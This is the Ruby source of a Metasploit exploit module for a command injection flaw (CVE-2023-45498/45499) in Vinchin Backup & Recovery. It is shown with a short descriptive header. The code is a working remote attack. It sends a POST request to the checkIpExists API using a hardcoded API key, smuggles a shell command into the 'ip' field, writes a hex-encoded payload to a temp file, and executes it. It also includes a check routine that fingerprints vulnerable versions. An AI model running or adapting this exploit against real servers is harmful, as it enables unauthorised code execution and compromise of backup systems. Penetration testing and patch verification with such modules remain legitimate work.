Headline
Vinchin Backup And Recovery Command Injection
This Metasploit module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0., v6.0., v6.7., and v7.0.. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Vinchin Backup and Recovery Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gregory Boddin (LeakIX)', # Vulnerability discovery 'Valentin Lobstein' # Metasploit module ], 'References' => [ ['CVE', '2023-45498'], ['CVE', '2023-45499'], ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'], ['URL', 'https://vinchin.com/'] # Vendor URL ], 'DisclosureDate' => '2023-10-26', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'AKA' => ['Vinchin Command Injection'] }, 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_CMD], 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'SSL' => true, 'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp' }, 'Privileged' => false ) ) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']), OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']), ] ) end def exploit hex_encoded_payload = payload.encoded.unpack('H*').first formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}" command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}" send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI'], 'api/'), 'vars_get' => { 'm' => '30', 'f' => 'checkIpExists', 'k' => datastore['APIKEY'] }, 'data' => "p={\"ip\":\"a||#{command}\"}" }) end def check target_uri_path = normalize_uri(target_uri.path, 'login.php') res = send_request_cgi('uri' => target_uri_path) return CheckCode::Unknown('Failed to connect to the target.') unless res return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200 version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/ version_match = res.body.match(version_pattern) unless version_match && version_match[1] return CheckCode::Unknown('Unable to extract version.') end version = Rex::Version.new(version_match[1]) print_status("Detected Vinchin version: #{version}") if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) || (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) || (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) || (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2')) return CheckCode::Appears else return CheckCode::Safe end endend